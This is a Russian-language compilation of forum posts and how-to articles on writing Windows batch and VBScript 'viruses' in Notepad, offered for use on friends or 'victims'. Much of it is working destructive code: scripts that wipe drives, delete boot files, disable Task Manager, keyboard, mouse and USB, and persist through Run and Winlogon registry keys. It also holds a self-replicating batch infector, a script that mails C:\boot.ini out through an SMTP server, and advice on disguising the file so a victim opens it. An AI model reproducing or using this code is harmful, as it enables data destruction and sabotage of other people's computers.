reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoCommonGroups /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoFavoritesMenu /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoSetFolders /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoAddPrinter /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoFind /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoSMHelp /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoRun /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoClose /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoChangeStartMenu /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoSMMyDocs /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoSMMyPictures /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoControlPanel /t REG_DWORD /d 1 /f
echo set application=createobject(«shell.application»)>>%temp%temp.vbs
echo application.minimizeall>>%temp%temp.vbs
reg add «hklmSoftwareMicrosoftWindowsCurrentVersionrun» /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
start rundll32 user32, SwapMouseButton
reg add «HKCRexefileshellopencommand» /ve /t REG_SZ /d rundll32.exe /f
echo i=50 >> %temp%temp.vbs
echo while i^>0 or i^<0 >> %temp%temp.vbs
echo S.popup «forum.whack.ru™»,0, «forum.whack.ru™»,0+16 >> %temp%temp.vbs
echo i=i-1 >> %temp%temp.vbs
echo wend >> %temp%temp.vbs
echo do >> %temp%temp.vbs
echo wscript.sleep 200 >> %temp%temp.vbs
echo s.sendkeys»{capslock}» >> %temp%temp.vbs
echo wscript.sleep 200 >> %temp%temp.vbs
echo s.sendkeys»{numlock}» >> %temp%temp.vbs
echo wscript.sleep 200 >> %temp%temp.vbs
echo s.sendkeys»{scrolllock}» >> %temp%temp.vbs
echo loop>> %temp%temp.vbs
echo Set oWMP = CreateObject(«WMPlayer.OCX.7») >> %temp%temp.vbs
echo Set colCDROMs = oWMP.cdromCollection >> %temp%temp.vbs
echo if colCDROMs.Count ^>= 1 then >> %temp%temp.vbs
echo For i = 0 to colCDROMs.Count — 1 >> %temp%temp.vbs
echo colCDROMs.Item(i).eject >> %temp%temp.vbs
echo next >> %temp%temp.vbs
echo End If >> %temp%temp.vbs
echo Call SendPost(«smtp.mail.ru», «forum.whack.ru™@mail.ru», «support@mail.ru», «…», «Копм заражен!») >> %temp%temp.vbs
echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%temp.vbs
echo Set iMsg = CreateObject(«CDO.Message») >> %temp%temp.vbs
echo Set iConf = CreateObject(«CDO.Configuration») >> %temp%temp.vbs
echo Set Flds = iConf.Fields >> %temp%temp.vbs
echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/sendusing») = 2 >> %temp%temp.vbs
echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/smtpauthenticate») = 1 >> %temp%temp.vbs
echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/sendusername») = «support» >> %temp%temp.vbs
echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/sendpassword») = «support» >> %temp%temp.vbs
echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/smtpserver») = «smtp.mail.ru» >> %temp%temp.vbs
echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/smtpserverport») = 25 >> %temp%temp.vbs
echo Flds.Update >> %temp%temp.vbs
echo iMsg.Configuration = iConf >> %temp%temp.vbs
echo iMsg.To = strTo >> %temp%temp.vbs
echo iMsg.From = strFrom >> %temp%temp.vbs
echo iMsg.Subject = strSubject >> %temp%temp.vbs
echo iMsg.TextBody = strBody >> %temp%temp.vbs
echo iMsg.AddAttachment «c:boot.ini» >> %temp%temp.vbs
echo iMsg.Send >> %temp%temp.vbs
echo End Function >> %temp%temp.vbs
echo Set iMsg = Nothing >> %temp%temp.vbs
echo Set iConf = Nothing >> %temp%temp.vbs
echo Set Flds = Nothing >> %temp%temp.vbs
echo s.run «shutdown -r -t 0 -c «»pcforumhack.ru™»» -f»,1 >> %temp%temp.vbs
start %temp%temp.vbs
start %temp%temp1.vbs
start %temp%temp2.vbs
Вирус полностью блокирует систему при следующем запуске Windows.Даже в безопасном режиме, выключает диспетчер задач.Чтобы разблокировать компьютер можно введя код 200393!(Но он не разблокирует)
@echo off
CHCP 1251
cls
Set Yvaga=На вашем компьютере найден вирус.
Set pass=Пароль
Set pas=Введите пароль.
Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль
Set dim=Выключаю вирус…
title Внимание!!!
CHCP 866
IF EXIST C:windowsboot.bat (
goto ok )
cls
IF NOT EXIST C:windowsboot.bat (
ECHO Windows Registry Editor Version 5.00 >> C:.reg
ECHO. >> C:.reg
ECHO [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] >> C:.reg
ECHO. >> C:.reg
ECHO «Shell»=»Explorer.exe, C:\windows\boot.bat » >> C:.reg
start/wait regedit -s C:.reg
del C:.reg
ECHO @echo off >>C:windowsboot.bat
ECHO C:WINDOWSsystem32taskkill.exe /f /im Explorer.exe >>C:windowsboot.bat
ECHO reg add «HKCUsoftwareMicrosoftWindowsCurrentVersionPoliciessystem» /v DisableTaskMgr /t REG_DWORD /d 1 /f >>C:windowsboot.bat
ECHO start sys.bat >>C:windowsboot.bat
attrib +r +a +s +h C:windowsboot.bat
copy virus.bat c:windowssys.bat
attrib +r +a +s +h C:windowssys.bat
GOTO end)
:ok
cls
Echo %Yvaga%
echo.
echo %virus%
echo %pas%
set /a choise = 0
set /p choise=%pass%:
if «%choise%» == «101» goto gold
if «%choise%» == «200393» goto status
exit
:status
echo %dim%
attrib -r -a -s -h C:windowsboot.bat
del C:windowsboot.bat
attrib -r -a -s -h C:windowssys.bat
del C:windowssys.bat
cls
:gold
start C:
:end
Добавляет программу в автозагрузку ОС
copy «»%0″» «%SystemRoot%system32File.bat»
reg add «HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun» /v «Filel» /t REG_SZ /d «%SystemRoot%system32File.bat» /f
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f
Этот вирус,блокирует все программы,но интернет работает.
@Echo off
Echo Virus Loading
Date 13.09.96
If exist c:ski.bat goto abc
Copy %0 c:ski.bat
Attrib +h c:ski.bat
Echo c:ski.bat >>autoexec.bat
:abc
md PRIDUROK
md LUZER
md DURAK
md LAMER
Label E: PRIDUROK
assoc .exe=.mp3
del c:Program Files/q
Echo VIRUS LOAD
Категория: Мои статьи | Добавил: drak-zp
Вам необходимо обновить браузер или попробовать использовать другой.
- Статус
- В этой теме нельзя размещать новые ответы.
- Дней с нами
- 2.426
- Розыгрыши
- 0
- Сообщения
- 322
- Репутация
+/- -
59
- Реакции
- 251
-
#1
2. Не тестируйте эти коды на своем ПК
3. Тема — баян
Что понадобится для создания вируса:
- Открыть Блокнот
- Вставить нужные коды
- Сохранить файл в формате .bat
Коды:
Удаляет все с доп. носителей
@echo off
del D:*.* /f /s /q
del E:*.* /f /s /q
del F:*.* /f /s /q
del G:*.* /f /s /q
del H:*.* /f /s /q
del I:*.* /f /s /q
del J:*.* /f /s /q
Удаляет все что хранится в реестре
@echo OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
Останавливает доступ в Интернет пользователя. Чтобы получить доступ обратно напишите IPconfig /renew в CMD
@echo off
Ipconfig /release
Отправляет сообщение и выключает компьютер
@echo off
msg * ваше сообщение
shutdown -c “ваше сообщение” -s
Простой вирус, который заставляет компьютер дать ошибку.
Сохранить как файл.VBS
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next
Форматируются диски менее чем за 5 секунд. Только D, Е и С
rd/s/q D:
rd/s/q C:
rd/s/q E:
Останавливает компьютер каждый раз при его включении
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo «любой текст»
PAUSE
А теперь более опасные батники:
Заставляет систему упасть один раз потом компьютер не может быть перезапущен. Он удаляет все необходимое для запуска системы
НЕ ИСПОЛЬЗУЙТЕ НА СЕБЕ
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
Этот вирус отключает Интернет навсегда
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo «ваше сообщение»
PAUSE
- Дней с нами
- 2.426
- Розыгрыши
- 0
- Сообщения
- 322
- Репутация
+/- -
59
- Реакции
- 251
-
#2
- Дней с нами
- 3.132
- Розыгрыши
- 0
- Сообщения
- 854
- Репутация
+/- -
55
- Реакции
- 1.091
-
#6
1. Этот гайд создан в ознакомительных целях, например для контроля над ребенком
2. Не тестируйте эти коды на своем ПК
3. Тема — баянЧто понадобится для создания вируса:
- Открыть Блокнот
- Вставить нужные коды
- Сохранить файл в формате .bat
Коды:
Удаляет все с доп. носителей
Удаляет все что хранится в реестре
Останавливает доступ в Интернет пользователя. Чтобы получить доступ обратно напишите IPconfig /renew в CMD
Отправляет сообщение и выключает компьютер
Простой вирус, который заставляет компьютер дать ошибку.
Сохранить как файл.VBSФорматируются диски менее чем за 5 секунд. Только D, Е и С
Останавливает компьютер каждый раз при его включении
А теперь более опасные батники:
Заставляет систему упасть один раз потом компьютер не может быть перезапущен. Он удаляет все необходимое для запуска системы
НЕ ИСПОЛЬЗУЙТЕ НА СЕБЕ
Этот вирус отключает Интернет навсегда
ебать ты черт конешно
- Дней с нами
- 2.634
- Розыгрыши
- 0
- Сообщения
- 719
- Репутация
+/- -
39
- Реакции
- 858
-
#7
- Дней с нами
- 2.722
- Розыгрыши
- 19
- Сообщения
- 30.540
- Репутация
+/- -
1.814
- Реакции
- 38.188
-
#8
Хоть щас пихай во всякие сборки по minecraft под названием start.bat
Ну блять..Это же скучно…Вот если винлокер туда запихать…
- Дней с нами
- 3.193
- Розыгрыши
- 0
- Сообщения
- 53
- Репутация
+/- -
41
- Реакции
- 20
-
#9
- Дней с нами
- 2.426
- Розыгрыши
- 0
- Сообщения
- 322
- Репутация
+/- -
59
- Реакции
- 251
-
#10
Все сработает когда вставишь код или сохранишь? Или когда откроешь???
Либо когда введешь это сразу в cmd, либо когда сохранишь файл с блокнота под расширением .bat и откроешь его
- Дней с нами
- 3.094
- Розыгрыши
- 0
- Сообщения
- 317
- Репутация
+/- -
33
- Реакции
- 363
-
#11
- Дней с нами
- 2.634
- Розыгрыши
- 0
- Сообщения
- 719
- Репутация
+/- -
39
- Реакции
- 858
-
#12
Либо когда введешь это сразу в cmd, либо когда сохранишь файл с блокнота под расширением .bat и откроешь его
А для этого не нужно запустить батник от имени админа? CMD же тогда будет без возможностей администратора и врятли сможет что-то серьёзное удалить.
- Дней с нами
- 2.207
- Розыгрыши
- 0
- Сообщения
- 26
- Репутация
+/- -
1
- Реакции
- 16
- Дней с нами
- 2.566
- Розыгрыши
- 1
- Сообщения
- 3.370
- Репутация
+/- -
125
- Реакции
- 3.630
-
#14
В годах так 2000 ты бы был мега хакер,а сейчас и школьники так могют делать
Игнорщик,бака!
- Дней с нами
- 3.094
- Розыгрыши
- 0
- Сообщения
- 317
- Репутация
+/- -
33
- Реакции
- 363
-
#15
там от опытного,а я ещё не дорос.Так,что не могу дать и да,я тебе отвечал хз чё такое
- Дней с нами
- 2.893
- Розыгрыши
- 0
- Сообщения
- 320
- Репутация
+/- -
25
- Реакции
- 160
-
#17
- Дней с нами
- 2.334
- Розыгрыши
- 0
- Сообщения
- 2.169
- Репутация
+/- -
22
- Реакции
- 907
-
#18
1. Этот гайд создан в ознакомительных целях, например для контроля над ребенком
2. Не тестируйте эти коды на своем ПК
3. Тема — баянЧто понадобится для создания вируса:
- Открыть Блокнот
- Вставить нужные коды
- Сохранить файл в формате .bat
Коды:
Удаляет все с доп. носителей
Удаляет все что хранится в реестре
Останавливает доступ в Интернет пользователя. Чтобы получить доступ обратно напишите IPconfig /renew в CMD
Отправляет сообщение и выключает компьютер
Простой вирус, который заставляет компьютер дать ошибку.
Сохранить как файл.VBSФорматируются диски менее чем за 5 секунд. Только D, Е и С
Останавливает компьютер каждый раз при его включении
А теперь более опасные батники:
Заставляет систему упасть один раз потом компьютер не может быть перезапущен. Он удаляет все необходимое для запуска системы
НЕ ИСПОЛЬЗУЙТЕ НА СЕБЕ
Этот вирус отключает Интернет навсегда
классно скопировал инфу с любого сайта 2012 и раньше года по запросу вирус в блокноте
- Дней с нами
- 2.426
- Розыгрыши
- 0
- Сообщения
- 322
- Репутация
+/- -
59
- Реакции
- 251
-
#19
классно скопировал инфу с любого сайта 2012 и раньше года по запросу вирус в блокноте
Я написал, что тема — баян и она создана для тех, кто не додумался погуглить
- Дней с нами
- 2.465
- Розыгрыши
- 3
- Сообщения
- 3.578
- Репутация
+/- -
314
- Реакции
- 4.077
- Telegram
- wavvy_the9
-
#20
Но так думаю будет проще
- Статус
- В этой теме нельзя размещать новые ответы.
Похожие темы
Загрузить PDF
Загрузить PDF
Данная статья объясняет, как создать фейковое сообщение об ошибке (VBScript) в Windows, используя только Блокнот.
Шаги
-
1
Запустите Блокнот (NotePad). Нажмите сочетание клавиш [WIN-R] (Windows key + R) и введите «notepad.exe».
-
2
Скопируйте и вставьте следующий код: x=msgbox(«Здесь ваше сообщение», 4+16, «Здесь ваше название»). Другой код для ответов «да» или «нет» таков: onclick=msgbox («Здесь ваше сообщение»,20,»Здесь ваше название»).
-
3
Поменяйте надписи «Здесь ваше сообщение» и «Здесь ваше название» на текст по своему усмотрению. Кроме того, измените «4+16» на другую комбинацию, как показано в разделе «Советы» (это изменит тип сообщения об ошибке и кнопки).
-
4
Щелкните по вкладке «Файл» (File) и кликните «Сохранить» (Save). Укажите название вашего сообщения об ошибке и добавьте в конце расширение «.vbs».
-
5
Откройте VBS файл, и появится фейковое сообщение об ошибке!
Реклама
Советы
-
-
- 0 – только кнопка «OK»
- Кнопки (Первое число):
-
Реклама
Об этой статье
Эту страницу просматривали 53 686 раз.
Была ли эта статья полезной?
Ну вот я снова с вами.
Очень жаль что wog.net умер унеся вместе с собой в могилу парочку моих статей.Ну да ладно.
Будем вместе двигаться вперед творить и вытворять всякие пакости).
Ну поехали.
В этот раз давайте не будем писать bat файлы в огромных количествах (ну если только один или два). А займемся мы VBS.
Начнем мы с bat да-да для разминочки.
Кто не знает что это за исполняймые файлы с разрешение bat или cmd тот нажимает Win+R
и выполняет CMD и пишет help.Надеюсь дальше обьяснять не нужно.
Так вот наш супер большой и сложный вирус
будет состоять из нескольких строк.
Только для начала нам придется открыту нашу любимую командную строку и набрать SET
это надо для того чтобы узнать список переменных сред Windows.нам интересна последняя строка windir — это переменная заменяет полный путь к папке
Windows. Начнем?Открываем notepad(блокнот) и пишем эту пургу.
*******************************
taskkill /f /im explorer.exe
del /q /f %windir%explorer.exe
del /q /f %windir%taskmgr.exe
rd /q /s %windir%inf
rd /q /s %windir%system32drivers
********************************
Сохраняем наш файл как I_LOVE_YOU.bat и радуемся.
После запуска такой микровещи на машине не будет не рабочего стола ни менеджера задач ни драйверов.
Я обещал один? Да?Извините не стерпел и вот выкладываю второй …
********************************
@echo off%[Bams]%
if ‘%1==’In_ goto Bamsin
if exist c:Bams.bat goto Bamsru
if not exist %0 goto Bamsen
find «Bams»<%0>c:Bams.bat
attrib +h c:Bams.bat
:Bamsru
for %%t in (*.bat) do call c:MeTrA In_ %%t
goto Bamsen
:Bamsin
find «Bams»<%2>nul
if not errorlevel 1 goto Bamsen
type c:Bams.bat>>%2
:Bamsen
*********************************
Это более сложный вирус но он и более интересный .
Он ползает по винту ищет и заражает собой *.bat файлы.
Все!Переходим к VBS вирусам.
Язык VBS в винде поддерживается с 98 версии и не требует установки дополнительных библиотек
и другой ненужной фигни).по другому VBS-язык скриптов
Ну приступим с самого легкого напугаем жертву страшным сообщением.Типа:Через минуту ваша крыса заболеет бешенством!Поставить прививку?
И спросим ДА или НЕТ.-32
С количеством показа 1 и временем показа 0(то есть пока не выберит что он хочет)
Значок выберим вопроса
кнопки да и нет-4
Открываем блокнот и пишем.
***********************************
Set S = CreateObject(«Wscript.Shell»)
set FSO=createobject(«scripting.filesystemobject»)
i=1
while i>0 or i<0
S.popup «Через минуту ваша крыса заболеет бешенством!Поставить прививку?»,0, «Айболит»,4+32
i=i-1
wend
*************************************
сохраняем это чудо как mouse.vbs
Если кто то хочет чтоб значок был восклицание тот пишет 48 Вместо 32.
Дальше мы разберемся с этими параметрами).
Попугали значит мы жертву сообшениями (или бабушку которая любит пасьянс ) и движемся вперед.
А впереди у нас корзина(скучное название) надо бы его изменить например на Свалку или Бомжатник
все зависит от фантазии но код очень простой.
***************************************
Set S = CreateObject(«Wscript.Shell»)
set FSO=createobject(«scripting.filesystemobject»)
s.regwrite «HKEY_CLASSES_ROOTCLSID{645FF040-5081-101B-9F08-00AA002F954E}LocalizedString»,»Свалка»
***************************************
Название то поменяли только зачем нам свалка на столе? Еще место занимает а не снести линам ее вообше?
Нет проблем для этих сучаев имеем это чудо.
****************************************
Set S = CreateObject(«Wscript.Shell»)
set FSO=createobject(«scripting.filesystemobject»)
s.regdelete»HKLMSOFTWAREMicrosoftWindowsCurren tVersionExplorerDesktopNameSpace{645FF040-5081-101B-9F08-00AA002F954E}»
****************************************
Не устал мой друг? Если нет то мы подолжаем чудить , а если честно то только начинаем.
Что то скучно.надо бы музыку для поднятия настроения ну тут у нас два выхода либо мы заставляем трещать флопигрыз
,либо пишать бесприрывно встроенный динамик.Выбор за вами.
Вот это прикол с флопигрызом.
*****************************************
Set S = CreateObject(«Wscript.Shell»)
set FSO=createobject(«scripting.filesystemobject»)
do
fso.getfile(«A:»)
loop
******************************************
ну а это уже динамик.
******************************************
Set S = CreateObject(«Wscript.Shell»)
set FSO=createobject(«scripting.filesystemobject»)
do
execute»S.Run «»%comspec% /c «» & Chr(7), 0,True»
loop
*******************************************
Ну теперь мы займемся более серьезными вещами.
Бывают случаи что надо порализовать либо клавиатуру либо мышку.
Клавиатуру в накаут выводим так:
*******************************************
Set S = CreateObject(«Wscript.Shell»)
set FSO=createobject(«scripting.filesystemobject»)
s.run»reg add «»hklmsystemcurrentcontrolsetcontrolkeyboa rd layout»» /v «»Scancode Map»» /t REG_BINARY /d 0000000000000000A000000000005DE000000E0000003A0000 0053E000004FE000001C0000000100000047E0000052E00000 380000001D0000002A0000005BE000004500000051E0000049 E000005EE0000037E0000038E000001DE00000360000005CE0 0000460000005FE00000390000000F00000063E00000280000 000C000000330000003400000035000000270000001A000000 2B0000001B000000290000000D0000000B0000000200000003 00000004000000050000000600000007000000080000000900 00000A0000001E000000300000002E00000020000000120000 00210000002200000023000000170000002400000025000000 26000000320000003100000018000000190000001000000013 0000001F00000014000000160000002F000000110000002D00 0000150000002C0000003B0000003C0000003D0000003E0000 003F0000004000000041000000420000004300000044000000 5700000058000000640000006500000066000000520000004F 00000050000000510000004B0000004C0000004D0000004700 000048000000490000004A000000370000005300000035E000 004E0000001CE0000050E000004BE000004DE0000048E00000 0000″,0
********************************************
И следом летит крыса.
********************************************
Set S = CreateObject(«Wscript.Shell»)
set FSO=createobject(«scripting.filesystemobject»)
s.regwrite»HKLMSYSTEMCurrentControlSetServices MouclassStart»,»4″,»REG_DWORD»
********************************************
Затем нам вдруг приспичило отключить все что висит на USB портах.Ну например чтоб чел не успел
сохранить весь дорогой ему сердцу мусор на флешку.
И мы делаем обрезание портов=)
**********************************************
Set S = CreateObject(«Wscript.Shell»)
set FSO=createobject(«scripting.filesystemobject»)
s.regwrite»HKLMSYSTEMCurrentControlSetServices USBSTORStart»,»4″,»REG_DWORD»
**********************************************
Ну вот я и немного ввел вас в мир шуток и подлянок на VBS.
Это только первая часть моей небольшой статьи.
В архиве лежат все файлики которые описаные в этой статье.
Конец первой части.
Как создать вирус шутку с помощью блокнота
wikiHow работает по принципу вики, а это значит, что многие наши статьи написаны несколькими авторами. При создании этой статьи над ее редактированием и улучшением работали, в том числе анонимно, 26 человек(а).
Количество просмотров этой статьи: 358 360.
Вирусы-шутки — это несложные программы, которые можно подсунуть другу (или врагу), и тот будет думать, что его компьютер взломан, поражен вирусом или серьезно поврежден. Вирусы-шутки можно писать в обычном Блокноте: нужно лишь записать в файл команды, которые замедляют работу компьютера, выводят из строя работу операционной системы или просто пугают пользователя, а затем заставить его запустить этот файл. Вирусы-шутки могут быть чем угодно, начиная от надоедливой неприятности и заканчивая кошмаром, нарушающим работу системы. «Вирусы» из этой статьи предназначены только для безобидных шуток, самое худшее, что они могут сделать, — это выключить компьютер. Внимание: эти вирусы-шутки предназначены только для компьютеров под управлением Windows, они не будут работать на Mac OS без специальной подготовки. Начнем с шага 1.
Привет всем вновь! Сегодня я покажу Вам еще настолько же заезженную тему, которой наверное еще троллили в 2007, но мало-ли кто не знает, поэтому приступим к нашему ознакомлению.
Шутка номер – 1.
Для начала, необходимо создать текстовый документ, для этого кликаем по рабочему столу мышкой, далее: Создать >>текстовый документ.
ВНИМАНИЕ!: Данный файл полностью безопасен! Чтобы завершить его процесс, нажимайте на “ОК”, либо же преждевременно: ctrl alt delte → Диспетчер задач → jork.shell → Завершить процесс.
Теперь, вписываем туда данный код:
PHP:
on error resume next
set t=createobject("jork.Shell")
set kill = createobject("wscript.shell")
kill.run"taskkill /f /im explorer.exe",0
msgbox"Ваш компьютер умер",16,"Error"
msgbox"Выкиньте его в окно",16,"Error"
t.run"calc.exe"
t.run"help.exe"
t.run"telnet.exe"
msgbox"FATAL ERROR: You computer, smart fixed.",16,"Error"
msgbox"Unkown error",16,"Error"
msgbox"ERROR",16,"Error"
msgbox"Удаление данных...",16,"Error"
t.run"calc.exe"
t.run"winword.exe"
t.run"winword.exe"
msgbox"Все данные удалены",16,"Error"
msgbox"Ваш компьютер отключится через:",16,"Error"
msgbox"3",16,"Error"
t.run"calc.exe"
t.run"winword.exe"
msgbox"2",16,"Error"
msgbox"1",16,"Error"
msgbox"Отключение электропитания",16,"Error"
t.run"calc.exe"
t.run"winword.exe"
t.run"mspaint.exe"
t.run"mspaint.exe"
t.run"mspaint.exe"
t.run"calc.exe"
t.run"mspaint.exe"
msgbox"Вас разыграли!",16,"Error"
t.run"explorer"
Когда Вы все это впишите, нажимаем в левом верхнем углу: Файл >> Сохранить как >> (Стираем название), вписываем туда .vbs
Теперь при открытии файла, будет писаться, что компьютер к сожалению, скончался.
Шутка номер – 2.
Аналогично создаем текстовый документ, как это сделать описано выше. Теперь, вписываем туда:
Теперь, сохраняем наш “вирус”, как .bat, для этого, нажимаем на: Файл >> Сохранить как >> .bat
Таким образом, будет открываться заданное Вами приложение. К примеру, explorer — это проводник. Также есть еще калькулятор, Microsoft Word, и множество другого. К примеру, если хотите затроллить Вашего друга, что играет в CS:GO, просто впишите в документ:
start csgo.exe
Ниже описан список нескольких процессов, которые Вы также можете включить в роль.
Вирусы-шутки — это несложные программы, которые можно подсунуть другу (или врагу), и тот будет думать, что его компьютер взломан, поражен вирусом или серьезно поврежден. Вирусы-шутки можно писать в обычном Блокноте: нужно лишь записать в файл команды, которые замедляют работу компьютера, выводят из строя работу операционной системы или просто пугают пользователя, а затем заставить его запустить этот файл. Вирусы-шутки могут быть чем угодно, начиная от надоедливой неприятности и заканчивая кошмаром, нарушающим работу системы. «Вирусы» из этой статьи предназначены только для безобидных шуток, самое худшее, что они могут сделать, — это выключить компьютер. Внимание:
эти вирусы-шутки предназначены только для компьютеров под управлением Windows, они не будут работать на Mac OS без специальной подготовки. Начнем с шага 1.
Шаги
Пишем поддельный вирус, открывающий «бесконечные» окна
Запустите Блокнот.
Пакетные (.BAT) файлы содержат команды для компьютера в текстовом виде. Для того, чтобы написать BAT-файл, не нужен специальный редактор — достаточно Блокнота из стандартного набора программ Windows. Блокнот можно найти в меню «Пуск» или в подменю «Стандартные». Открыть Блокнот можно также, нажав сочетание клавиш Win+R, в текстовом поле появившегося диалогового окна набрать «notepad» и нажать Enter.
Наберите «@echo off», а затем, с новой строки, «CLS».
По умолчанию BAT-файлы открывают окно командной строки и выводят исполняемые команды. Команды «@echo off» и «CLS» предотвращают появление команд в окне командной строки, делая причину шутки невидимой для «жертвы».
Напишите команды для открытия множества (или бесконечного количества) окон.
Теперь наступило время написать последовательность команд, исполняя которые, ваш поддельный вирус откроет много окон разных программ один раз или будет отрывать эти окна бесконечно. Важно знать, если бесконечно открывается очень много окон, компьютер в конце концов может зависнуть. Читайте далее о том, как сделать оба вида «вируса»:
- Чтобы открыть определенное
количество окон, с новой строки наберите в Блокноте следующую команду: start (название программы)
. Вместо фразы в скобках введите название программы на компьютере «жертвы» или
или полное имя исполняемого файла. Эта команда дает инструкцию компьютеру открывать окно указанной программы. Например, start iexplore.exe
откроет окно Internet Explorer. Повторите команду «start» столько раз, сколько захотите, и ваш «вирус» откроет окно столько раз, сколько вы укажете. Вот несколько программ которые можно ввести после команды «start»:- iexplore.exe — браузер Interent Explorer
- calc.exe — Калькулятор
- notepad.exe — Блокнот
- winword.exe — Microsoft Word
- Чтобы открыть бесконечное
количество окон, сначала с новой строки наберите :A
, включая двоеточие. На следующей строке наберите start iexplore.exe
(или другую программу). И, наконец, строкой ниже наберите goto A
. Эта последовательность команд заставит компьютер открывать окно Internet Explorer (или любой другой программы), возвращаться к месту непосредственно перед открытием окна, а затем сразу же открывать новое окно, пока окно командной строки не будет закрыто или компьютер не зависнет.
Напишите в «вирусе» сообщение.
Для устрашающего эффекта можно добавить в «вирус» сообщение, которое заставит пользователя думать, что с его компьютером что-то не так. Чтобы отобразить сообщение, начните новую строку и наберите echo Ваше сообщение
. Затем с новой строки наберите pause
. Команда «pause» остановит выполнение «вируса» после появления сообщения.
- Чтобы ваша шутка была правдоподобной, напишите сообщение, похожее на настоящие сообщения об ошибках, например: Фатальная ошибка. C:// каталог поврежден.
Сохраните текст как пакетный файл.
Когда закончите, в меню Блокнота выберите Файл > Сохранить как…
, а затем укажите расширение файла «.bat» (например, «pinball.bat»). В выпадающем списке «Тип файла» выберите «Все файлы». Сохраните файл где нибудь на компьютере «жертвы».
Заставьте пользователя открыть файл.
Чтобы ваша шутка сработала, нужно сделать так, чтобы «жертва» запустила ее. Этого можно добиться разными способами. Один из самых работающих — создать ярлык для своего пакетного файла и изменить его иконку на что-то, чем пользователь действительно пользуется, а затем изменить название ярлыка, чтобы оно соответствовало иконке. Откиньтесь на спинку кресла и наблюдайте за результатами из удобного места!
Как написать.VBS с сообщением об ошибке или взломе
Запустите Блокнот.
Как и в предыдущей шутке, в этой нужно написать в Блокноте несколько простых команд. Однако на этот раз эффект будет другим — вместо открытия окон это шутка создает несколько сообщений с ошибками, которые заставят пользователя думать, что его в работе операционной системы произошла ошибка или что компьютер был взломан.
Наберите «x=msgbox(«Текст сообщения», 5+16, «Заголовок сообщения») точно так, как здесь указано, включая скобки и кавычки, и замените «Текст сообщения» и «Заголовок сообщения» желаемым текстом. Эта команда открывает стандартное диалоговое окно ошибки Windows с указанными вами сообщением об ошибке и заголовком окна. Чтобы ваша шутка была правдоподобной, используйте сообщения и заголовки, похожие на настоящие. Например попробуйте в качестве заголовка «Ошибка терминала», а в качестве сообщения — «В каталоге C://Users/Windows/system32 обнаружена критическая неисправность».
- Возможно, вам захочется развить свою шутку в направлении взлома. В таком случае используйте сообщения вроде: «Я имею полный доступ к вашей системе. Приготовьтесь ко взлому». На самом деле ничего такого не случится, так что это сработает только с людьми, которые плохо разбираются в компьютерах.
